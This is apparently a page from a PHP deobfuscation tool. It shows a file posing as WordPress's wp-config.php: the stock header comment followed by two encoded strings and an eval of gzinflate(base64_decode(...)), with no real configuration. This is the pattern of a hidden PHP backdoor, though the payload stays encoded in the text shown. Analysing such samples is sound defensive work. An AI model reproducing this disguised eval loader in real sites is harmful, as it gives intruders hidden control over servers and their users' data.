Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /** * The base configuration for WordPress * * The wp-config.php creation scr..

Decoded Output download

<?php 
/** 
 * The base configuration for WordPress 
 * 
 * The wp-config.php creation script uses this file during the installation. 
 * You don't have to use the website, you can copy this file 
 * and fill in the values. 
 * 
 * This file contains the following configurations: 
 * 
 * * Database settings 
 * * Secret keys 
 * * Database table prefix 
 * * ABSPATH 
 * 
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/ 
 * 
 * @package WordPress 
 */ 
$Cyto = "Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUPHJrNAEAWsA"; 
$Lix = "==QRBLheGs/3r2Wt3c8IXdsrMGRQIujCVmDBTkncluSOHi+5Ad+vOtHl3sw3Vr92qkXoV5FP87pnk8cMy9ZzbgxtWkGtVtj1p7gLIEN4h/EhzrsKlqxGyAW0m3UE8FuRS9sJqTohUHmhbyHP0H2rmYDb0/79QHOt9ORnywPaL+QDumW5ypsoWV1ET0Yed5GilvFovWBu9WaTsTNFyWui1A4ucIJRULu4/56kpugBJbsxkXjJbJYZN+hGlg8dGYL5tRWoCRozkUQzcEGIhUGVLcWsSF5UU+xMquWJ0rgKKgWKLFBggkYifRIudp7HchS5SikhJ6zz5sknjREYY+gEMXfHCs9LHytFV9qUmIHnp5OqWKQZKSsUSOTL3qS+67OSnfZP5DnkFkNB/VXrm4++gMHpSLdzLWn6QsK4bS3cYgudmaj6I8dVjtAay4YH6fx3GDBMDv0bS2In45/pBgVA"; 
eval(htmlspecialchars_decode(gzinflate(base64_decode($Cyto)))); 
exit; 
?>

Did this file decode correctly?

Original Code

<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
 *
 * @package WordPress
 */
$Cyto = "Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JT\x635PSdUoLikqSi3TUPHJrNAE\x41Ws\x41";
$Lix = "==QRBLheGs/3r2Wt3c8IXdsrMGRQIujCVmDBTkncluSOHi+5Ad+vOtHl3sw3Vr92qkXoV5FP87pnk8cMy9ZzbgxtWkGtVtj1p7gLIEN4h/EhzrsKlqxGyAW0m3UE8FuRS9sJqTohUHmhbyHP0H2rmYDb0/79QHOt9ORnywPaL+QDumW5ypsoWV1ET0Yed5GilvFovWBu9WaTsTNFyWui1A4ucIJRULu4/56kpugBJbsxkXjJbJYZN+hGlg8dGYL5tRWoCRozkUQzcEGIhUGVLcWsSF5UU+xMquWJ0rgKKgWKLFBggkYifRIudp7HchS5SikhJ6zz5sknjREYY+gEMXfHCs9LHytFV9qUmIHnp5OqWKQZKSsUSOTL3qS+67OSnfZP5DnkFkNB/VXrm4++gMHpSLdzLWn6QsK4bS3cYgudmaj6I8dVjtAay4YH6fx3GDBMDv0bS2In45/pBgVA";
eval(htmlspecialchars_decode(gzinflate(base64_decode($Cyto))));
exit;
?>

Function Calls

gzinflate 1
base64_decode 1
htmlspecialchars_decode 1

Variables

$Lix ==QRBLheGs/3r2Wt3c8IXdsrMGRQIujCVmDBTkncluSOHi+5Ad+vOtHl3sw3..
$Cyto Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9J..

Stats

MD5 58f90d145f1d6526ff12c3c8e8eda92e
Eval Count 0
Decode Time 39 ms